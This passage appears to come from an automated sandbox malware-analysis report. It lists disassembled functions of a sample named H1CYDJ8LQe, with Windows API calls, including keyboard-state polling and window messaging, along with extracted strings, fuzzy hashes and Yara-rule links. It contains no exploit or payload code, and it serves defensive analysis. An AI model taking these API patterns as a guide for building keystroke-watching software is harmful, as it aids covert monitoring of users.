                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: __wcsicoll$ClassMessageNameParentSend
                                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                            • API String ID: 3125838495-3381328864
                                                            • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                            • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                                            • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                            • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                                            Function 004491B9 Relevance: 19.7, APIs: 13, Instructions: 246windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                                            • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                                            • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                                            • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                                            • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CharNext
                                                            • String ID:
                                                            • API String ID: 1350042424-0
                                                            • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                            • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                                            • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                            • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                                            Function 00478656 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 197COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                              • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                            • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                                            • _wcscpy.LIBCMT ref: 004787E5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                            • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                            • API String ID: 3052893215-2127371420
                                                            • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                            • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                                            • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                            • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                                            Function 0045E737 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 163COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                            • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                                            • __swprintf.LIBCMT ref: 0045E7F7
                                                            • _wprintf.LIBCMT ref: 0045E8B3
                                                            • _wprintf.LIBCMT ref: 0045E8D7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                            • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                            • API String ID: 2295938435-2354261254
                                                            • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                            • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                                            • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                            • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                                            Function 004531B1 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 160COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: __swprintf_wcscpy$__i64tow__itow
                                                            • String ID: %.15g$0x%p$False$True
                                                            • API String ID: 3038501623-2263619337
                                                            • Opcode ID: 1bd516ca49f477e8a3ed3b5693b6511736bfb32664ccdf6525c3e88e5b2a74d5
                                                            • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                                            • Opcode Fuzzy Hash: 1bd516ca49f477e8a3ed3b5693b6511736bfb32664ccdf6525c3e88e5b2a74d5
                                                            • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                                            Function 0045E538 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 154COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                            • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                                            • __swprintf.LIBCMT ref: 0045E5F6
                                                            • _wprintf.LIBCMT ref: 0045E6A3
                                                            • _wprintf.LIBCMT ref: 0045E6C7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                            • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                            • API String ID: 2295938435-8599901
                                                            • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                            • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                                            • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                            • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                                            Function 00443B61 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 99sleepwindowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • timeGetTime.WINMM ref: 00443B67
                                                              • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                                            • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                                            • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00443BC8
                                                            • SetActiveWindow.USER32(?), ref: 00443BEC
                                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                                            • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00443C22
                                                            • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                                            • IsWindow.USER32(?), ref: 00443C3A
                                                            • EndDialog.USER32(?,00000000), ref: 00443C4C
                                                              • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                              • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                              • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                            • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                                            • String ID: BUTTON
                                                            • API String ID: 1834419854-3405671355
                                                            • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                            • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                                            • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                            • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                                            Function 00454014 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 93windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                                            • LoadStringW.USER32(00000000), ref: 00454040
                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                            • _wprintf.LIBCMT ref: 00454074
                                                            • __swprintf.LIBCMT ref: 004540A3
                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                            • API String ID: 455036304-4153970271
                                                            • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                            • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                                            • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                            • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                                            Function 00467C8E Relevance: 18.3, APIs: 12, Instructions: 310COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                                            • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                                            • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                                            • _memmove.LIBCMT ref: 00467EB8
                                                            • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                                            • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                                            • _memmove.LIBCMT ref: 00467F6C
                                                            • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                                            • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                              • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                            • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                            • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                                            • String ID:
                                                            • API String ID: 2170234536-0
                                                            • Opcode ID: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                            • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                                            • Opcode Fuzzy Hash: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                            • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                                            Function 00453C57 Relevance: 18.2, APIs: 12, Instructions: 190keyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetKeyboardState.USER32(?), ref: 00453CE0
                                                            • SetKeyboardState.USER32(?), ref: 00453D3B
                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                                            • GetKeyState.USER32(000000A0), ref: 00453D75
                                                            • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                                            • GetKeyState.USER32(000000A1), ref: 00453DB5
                                                            • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                                            • GetKeyState.USER32(00000011), ref: 00453DEF
                                                            • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                                            • GetKeyState.USER32(00000012), ref: 00453E26
                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                                            • GetKeyState.USER32(0000005B), ref: 00453E5D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: State$Async$Keyboard
                                                            • String ID:
                                                            • API String ID: 541375521-0
                                                            • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                            • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                                            • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                            • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                                                            Function 004357B7 Relevance: 18.2, APIs: 12, Instructions: 184COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                                            • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                                            • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                                            • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                                            • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                                            • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                                            • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                                            • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                                            • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                                            • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                            • String ID:
                                                            • API String ID: 3096461208-0
                                                            • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                            • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                                            • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                            • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                                            Function 004714D9 Relevance: 18.1, APIs: 12, Instructions: 132windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                                            • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                                            • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                                            • DeleteObject.GDI32(?), ref: 0047151E
                                                            • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                                            • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                                            • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                                            • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                                            • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                                            • DeleteObject.GDI32(?), ref: 004715EA
                                                            • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                                            • String ID:
                                                            • API String ID: 3218148540-0
                                                            • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                            • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                                            • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                            • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                                            Function 00433784 Relevance: 18.1, APIs: 12, Instructions: 119COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
